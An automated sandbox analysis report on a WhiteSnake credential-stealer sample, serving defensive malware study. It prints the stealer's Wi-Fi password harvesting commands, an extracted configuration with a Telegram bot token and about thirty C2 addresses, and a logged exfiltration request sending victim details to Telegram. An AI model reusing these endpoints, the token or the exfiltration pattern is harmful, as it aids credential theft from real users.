Edit tour

Windows Analysis Report
73ybGtnYXx.exe

Overview

General Information

Sample name:	73ybGtnYXx.exe renamed because original name is a hash value
Original sample name:	ea08b197bbe8bc874a5c65500db03bf2.exe
Analysis ID:	1640529
MD5:	ea08b197bbe8bc874a5c65500db03bf2
SHA1:	3cbe0f9a6bb6c1600e196d3c2b54132c72ccce0d
SHA256:	03423b8784cac66602f6dc04f6303668951e9c7280a80535a708d59e6cf82312
Tags:	exeWhiteSnakeStealeruser-abuse_ch
Infos:

Detection

WhiteSnake Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected WhiteSnake Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

73ybGtnYXx.exe (PID: 4296 cmdline: "C:\Users\user\Desktop\73ybGtnYXx.exe" MD5: EA08B197BBE8BC874A5C65500DB03BF2)

cmd.exe (PID: 6200 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7336 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 7352 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 7360 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 7396 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7448 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 7464 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 7472 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage"}

Threatname: WhiteSnake

{"Version": "1.6.3.4", "Telegram C2": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684", "C2 urls": ["http://206.166.251.4:8080", "http://167.99.138.249:8080", "http://46.4.73.118:9000", "http://206.189.109.146:80", "http://194.164.198.113:8080", "http://45.82.65.63:80", "https://5.196.181.135:443", "http://95.216.147.179:80", "http://185.217.98.121:8080", "http://116.202.101.219:8080", "http://185.217.98.121:80", "http://159.203.174.113:8090", "http://107.161.20.142:8080", "https://192.99.196.191:443", "https://44.228.161.50:443", "https://154.9.207.142:443", "http://66.42.56.128:80", "http://8.219.110.16:9999", "https://138.2.92.67:443", "http://8.134.71.132:8082", "http://41.87.207.180:9090", "http://18.228.80.130:80", "http://168.138.211.88:8099", "http://47.110.140.182:8080", "http://129.151.109.160:8080", "http://101.43.160.136:8080", "http://101.132.223.26:8080", "http://101.126.19.171:80", "http://38.60.191.38:80", "http://47.96.78.224:8080", "https://101.126.19.171:443"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_WhiteSnake	Yara detected WhiteSnake Stealer	Joe Security
Process Memory Space: 73ybGtnYXx.exe PID: 4296	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 73ybGtnYXx.exe PID: 4296	JoeSecurity_WhiteSnake	Yara detected WhiteSnake Stealer	Joe Security
Process Memory Space: 73ybGtnYXx.exe PID: 4296	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\73ybGtnYXx.exe", ParentImage: C:\Users\user\Desktop\73ybGtnYXx.exe, ParentProcessId: 4296, ParentProcessName: 73ybGtnYXx.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6200, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 206.166.251.4, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\73ybGtnYXx.exe, Initiated: true, ProcessId: 4296, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49683

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\73ybGtnYXx.exe", ParentImage: C:\Users\user\Desktop\73ybGtnYXx.exe, ParentProcessId: 4296, ParentProcessName: 73ybGtnYXx.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6200, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T12:27:16.291521+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	49683	206.166.251.4	8080	TCP
2025-03-17T12:27:37.795494+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	49689	167.99.138.249	8080	TCP
2025-03-17T12:27:59.257897+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	60233	46.4.73.118	9000	TCP
2025-03-17T12:28:00.860262+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	60234	206.189.109.146	80	TCP
2025-03-17T12:28:22.291543+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	60235	194.164.198.113	8080	TCP
2025-03-17T12:28:43.671509+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	60236	45.82.65.63	80	TCP
2025-03-17T12:28:46.152010+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	60238	95.216.147.179	80	TCP
2025-03-17T12:28:46.887962+0100	2045868	1	Successful Credential Theft Detected	192.168.2.8	60239	185.217.98.121	8080	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T12:28:48.548401+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	60240	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 73ybGtnYXx.exe

Avira: detected

Found malware configuration

Source: 73ybGtnYXx.exe	Malware Configuration Extractor: WhiteSnake {"Version": "1.6.3.4", "Telegram C2": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684", "C2 urls": ["http://206.166.251.4:8080", "http://167.99.138.249:8080", "http://46.4.73.118:9000", "http://206.189.109.146:80", "http://194.164.198.113:8080", "http://45.82.65.63:80", "https://5.196.181.135:443", "http://95.216.147.179:80", "http://185.217.98.121:8080", "http://116.202.101.219:8080", "http://185.217.98.121:80", "http://159.203.174.113:8090", "http://107.161.20.142:8080", "https://192.99.196.191:443", "https://44.228.161.50:443", "https://154.9.207.142:443", "http://66.42.56.128:80", "http://8.219.110.16:9999", "https://138.2.92.67:443", "http://8.134.71.132:8082", "http://41.87.207.180:9090", "http://18.228.80.130:80", "http://168.138.211.88:8099", "http://47.110.140.182:8080", "http://129.151.109.160:8080", "http://101.43.160.136:8080", "http://101.132.223.26:8080", "http://101.126.19.171:80", "http://38.60.191.38:80", "http://47.96.78.224:8080", "https://101.126.19.171:443"]}
Source: 73ybGtnYXx.exe.4296.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 73ybGtnYXx.exe	Virustotal: Detection: 58%			Perma Link
Source: 73ybGtnYXx.exe	ReversingLabs: Detection: 71%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Code function: 0_2_00007FF936AA7BA1 CryptUnprotectData,

0_2_00007FF936AA7BA1

Source: unknown	HTTPS traffic detected: 5.196.181.135:443 -> 192.168.2.8:60237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60240 version: TLS 1.2

Source: 73ybGtnYXx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AB01FDh	0_2_00007FF936AAFF7E
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then dec eax	0_2_00007FF936AA243A
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AA4914h	0_2_00007FF936AA4121
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AB301Ah	0_2_00007FF936AB2A8E
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936ABCBA4h	0_2_00007FF936ABCA0B
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then dec eax	0_2_00007FF936AACF1A
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AA48E8h	0_2_00007FF936AA4874
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AA4914h	0_2_00007FF936AA4874
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AACF4Eh	0_2_00007FF936AAC67F
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AB301Ah	0_2_00007FF936AB2E3D
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AACF4Eh	0_2_00007FF936AACB66
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AA6E1Ch	0_2_00007FF936AA6C19
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then dec eax	0_2_00007FF936AB18EF
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AAF398h	0_2_00007FF936AAF12C
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 4x nop then jmp 00007FF936AB3731h	0_2_00007FF936AB3261

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:49683 -> 206.166.251.4:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60233 -> 46.4.73.118:9000
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60235 -> 194.164.198.113:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60238 -> 95.216.147.179:80
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60236 -> 45.82.65.63:80
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:49689 -> 167.99.138.249:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60234 -> 206.189.109.146:80
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.8:60239 -> 185.217.98.121:8080
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:60240 -> 149.154.167.220:443

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 60233 -> 9000

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.8:49683 -> 206.166.251.4:8080
Source: global traffic	TCP traffic: 192.168.2.8:49689 -> 167.99.138.249:8080
Source: global traffic	TCP traffic: 192.168.2.8:60233 -> 46.4.73.118:9000
Source: global traffic	TCP traffic: 192.168.2.8:60235 -> 194.164.198.113:8080
Source: global traffic	TCP traffic: 192.168.2.8:60239 -> 185.217.98.121:8080

Source: global traffic

TCP traffic: 192.168.2.8:60223 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684&text=%23Lebensborn2%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E358075%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.15Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4
Source: unknown	TCP traffic detected without corresponding DNS query: 206.166.251.4

Source: global traffic	HTTP traffic detected: GET /bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259165684&text=%23Lebensborn2%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E358075%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.15Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.217.98.121%3A8080%2Fget%2FhX8i6V7aqg%2F2r1j6_user%40358075_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 11:28:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.126.19.171:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.132.223.26:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.43.160.136:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.202.101.219:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://159.203.174.113:8090
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249:8080/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249:8080/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.99.138.249:80802(
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.138.211.88:8099
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080/get
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080/hX8i6V7aqg/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80802(
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080
